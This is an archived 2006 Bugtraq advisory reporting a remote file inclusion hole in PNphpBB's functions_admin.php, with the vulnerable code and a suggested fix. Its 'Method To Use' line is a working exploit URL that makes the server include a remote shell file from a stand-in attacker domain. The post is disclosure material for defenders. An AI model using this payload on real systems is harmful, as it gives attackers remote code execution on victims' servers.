[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

AzzCoder => PNphpBB (Latest) Remote File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: AzzCoder => PNphpBB (Latest) Remote File Include
From: azzcoder@xxxxxxxxxxx
Date: 18 Sep 2006 03:28:06 -0000

Vendor: http://www.pnphpbb.com/

Vulnerable File: includes/functions_admin.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:

http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

How To Fix:

Add this code before the include

if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}

Follow-Ups:
- Re: AzzCoder => PNphpBB (Latest) Remote File Include
  - From: Carsten Eilers

Prev by Date: Re: IE ActiveX 0day?
Next by Date: Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
Previous by thread: Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability
Next by thread: Re: AzzCoder => PNphpBB (Latest) Remote File Include
Index(es):
- Date
- Thread